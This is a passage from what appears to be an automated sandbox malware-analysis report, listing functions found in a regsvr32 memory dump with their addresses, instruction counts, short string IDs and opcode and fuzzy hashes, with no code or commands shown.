                                                                                                                                                                                                                    • API String ID: 0-3522424648
                                                                                                                                                                                                                    • Opcode ID: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                                                                                                                                    • Instruction ID: 100c069e12b2b7b8ad604c9bc2ec8e0c05df9454f381e50eadaa8ad556222344
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30021770A04709EFDF58DF68C08959EBBF2FB44304F00C16DE84AAA260D775DA59CB85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258EF14 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: x]!-
                                                                                                                                                                                                                    • API String ID: 0-585868058
                                                                                                                                                                                                                    • Opcode ID: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                                                                                                                                    • Instruction ID: e5704ab7be0b8637d2732724454007aace4e2220b14b5fa06476a15feb46c575
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3D199B1A0060DCFDBA8CF78C44A5DD7BF1FB48308F606129E826AA2B2D7749904CF54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259A8B0 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: }^O
                                                                                                                                                                                                                    • API String ID: 0-3039680174
                                                                                                                                                                                                                    • Opcode ID: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                                                                                                                                                    • Instruction ID: a086d192a5173118ccfebb22cd670ef0522f5349c7fa5f64073b5d3815207f98
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BA17BB2502749CFDB98DF28C69A59D3BE1FF55308F004129FC1E9A2A0D3B4E925CB49
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02594D20 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: RH
                                                                                                                                                                                                                    • API String ID: 0-2975065227
                                                                                                                                                                                                                    • Opcode ID: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                                                                                                                                                    • Instruction ID: 7ea0c006766af052da8ec820a9da3d937a1f0f94d5f91c0a432c06a2caf11b7c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6051277111C7448FC7A8DF18D4C66AAB7E5FB84310FA0991DE8CEC7251DF74A88A8B46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258BE90 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: Y
                                                                                                                                                                                                                    • API String ID: 0-579211002
                                                                                                                                                                                                                    • Opcode ID: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                                                                                                                                                    • Instruction ID: a0174e46e248d2f9e17c25344b245ebbf3ca562ca9e395c469118d779f2b3454
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C51F4715107898BDB58DF28C88A0DD3BA1FB4935CF424318ED8EA62A1D7BCD845CF49
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258D6CC Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: vOs
                                                                                                                                                                                                                    • API String ID: 0-1852020951
                                                                                                                                                                                                                    • Opcode ID: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                                                                                                                                                    • Instruction ID: 8edc1cd8148d9c24144e72f94f5c193bc96b57cfac46a454570c8d2008bf193e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C619DB190030E8FDB49DF68D48A5CE7FB0FB64398F204519E845A6260D7B896A8CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258461C Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: *)
                                                                                                                                                                                                                    • API String ID: 0-1811957435
                                                                                                                                                                                                                    • Opcode ID: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                                                                                                                                                    • Instruction ID: 2f942301dc5f5fdc74855d2fb81ff431a22c0ebae0d7facd8f724000a05ea3d4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F31953061CB898FC728DF29D08556ABBE0FB99305F50462EE98AC7355DB70D805CB86
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258F77C Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: t
                                                                                                                                                                                                                    • API String ID: 0-1935021737
                                                                                                                                                                                                                    • Opcode ID: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                                                                                                                                                    • Instruction ID: 655c5d50fa68ef85afba6f7da3cbfe1a870446bd2324af204b29df2a6d63ee0b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31C03020CB448FE768EF2CD48516ABBE1FB9A354F104A6DE5CAC7266D770D805CB86
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025A181C Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: __
                                                                                                                                                                                                                    • API String ID: 0-2267946753
                                                                                                                                                                                                                    • Opcode ID: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                                                                                                                                                    • Instruction ID: 21f0c5090d205bbf8e4967fab496675ec99e2cc48204888d0263355a4e45aa4f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E41F070508B858BE758DF29C18941ABBF2FBC9344F504A2DF69A87360C775D845CF42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02589408 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: GSn
                                                                                                                                                                                                                    • API String ID: 0-1733515909
                                                                                                                                                                                                                    • Opcode ID: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                                                                                                                                                    • Instruction ID: 72bc3a6dbf5d2daebd0e544e24fa4c9149962373911744472736f4df9833cfb6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF51D7B090038E8FDF48DF64C84A5DE7BB1FB58358F104A1DEC66A6290D3B89664CF84
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025A8500 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 8=
                                                                                                                                                                                                                    • API String ID: 0-237953557
                                                                                                                                                                                                                    • Opcode ID: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                                                                                                                                                    • Instruction ID: 432b485159ee9aa0fec82c08be5dbef5c04d95363974faf15288552ace76be0e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3314B30208B458BDB5CDF2CC49922EBAE1FBD9300F448A2DE58AD7365DB34D845CB86
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025920E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: K
                                                                                                                                                                                                                    • API String ID: 0-425913083
                                                                                                                                                                                                                    • Opcode ID: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                                                                                                                                                    • Instruction ID: 8225d243bdf5707a2af56175e4c1bf0fb412e61944b528eb30ea74f616d70d02
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7941F7B180438ECFDB48CF68D8864DE7BB0FB58344F114A19E866A6250D3B8D665CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025908CC Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: t"
                                                                                                                                                                                                                    • API String ID: 0-2131657386
                                                                                                                                                                                                                    • Opcode ID: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                                                                                                                                                    • Instruction ID: aae10b1084bb05e07832f1d22141e7e76e29e9bf464768ade9a2585eb73bd454
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6141D67180070D8BDF48DF64C48A0DE7FB1FB483A8F65621DE81AA6290D3B89585CF99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02593CD4 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: gLv
                                                                                                                                                                                                                    • API String ID: 0-1669999040
                                                                                                                                                                                                                    • Opcode ID: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                                                                                                                                                    • Instruction ID: 8924400e662ea1d33ff213fd0a2a9162a1746203cc0fe42fbfbaec9b0b680ded
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D41A0B190078E8FDF84CF64C88A4DE7BB0FB18358F104619E866A6290D3B89665CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025818DC Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 2|
                                                                                                                                                                                                                    • API String ID: 0-4112153497
                                                                                                                                                                                                                    • Opcode ID: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                                                                                                                                                    • Instruction ID: a1b6926cf1ce28f6dad34e6fd43a599c67bb8a763a6a0f0f6c071ff5e78ac394
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC31E3715083408FD768DF28C58A55BBBF1FBC6704F50891DE6CA8A260DB76D849CB03
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025A4E8C Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: v)v
                                                                                                                                                                                                                    • API String ID: 0-2248367734
                                                                                                                                                                                                                    • Opcode ID: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                                                                                                                                    • Instruction ID: d96c79e8aa79f49f66a8d652e2a844a027569f37215c388f2ed3d7ec0118180e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6431FEB0D106199BDF88DFB8D98A4DDBBF0BB48308F50822DD816B6290D7785A45CF68
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259A244 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: b
                                                                                                                                                                                                                    • API String ID: 0-1908338681
                                                                                                                                                                                                                    • Opcode ID: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                                                                                                                                    • Instruction ID: 17bdd88a76ea742b17f3307574b3be47e3e99a9a8e87152f7e628db9e49eb398
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09318BB55187808BD748DF28C08651ABBE1BBCC308F404B1DF8CAEB2A1D778D645CB4A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258D33C Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: Y
                                                                                                                                                                                                                    • API String ID: 0-579211002
                                                                                                                                                                                                                    • Opcode ID: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                                                                                                                                    • Instruction ID: 3905b0f92365bb91672009248d65bd91db3d35b841bf4746a7ab911bc2e22770
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A33199B0628781AFD78CDF28D49692EBBE1BBD9314F816A1DF9868B350D774D404CB42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02590E2C Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 0}
                                                                                                                                                                                                                    • API String ID: 0-2955618701
                                                                                                                                                                                                                    • Opcode ID: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                                                                                                                                    • Instruction ID: 3e7e0eca6b7df2cf9e22f590a0720919f810bbceeb8c715e312b2ca61f84fb9a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95319DB052C380AFD388DF28D48591BBBE1BB88354F816A1DF8869A3A0D374D414CB47
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025997CC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: S}
                                                                                                                                                                                                                    • API String ID: 0-4277866985
                                                                                                                                                                                                                    • Opcode ID: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                                                                                                                                    • Instruction ID: 6eca092c98c3adfaed0121b155035ca3d2c3a6a6fc12d10904b790ccf03c6d1f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4317EB0528781AFD398DF28D49A81BBBF1FB88304F806E2DF88687294D775D445CB02
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025898AC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 6N
                                                                                                                                                                                                                    • API String ID: 0-1503784733
                                                                                                                                                                                                                    • Opcode ID: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                                                                                                                                    • Instruction ID: f4a86dc4653c28cccd562090cb365a0bf87d83b70404bf80af20f8f7627260ee
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33316CB19087849BD349DF28D44941ABBE1BB9C70CF404B1DF4CAAB394D778DA05CB4A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259BDA0 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: H-
                                                                                                                                                                                                                    • API String ID: 0-1037293833
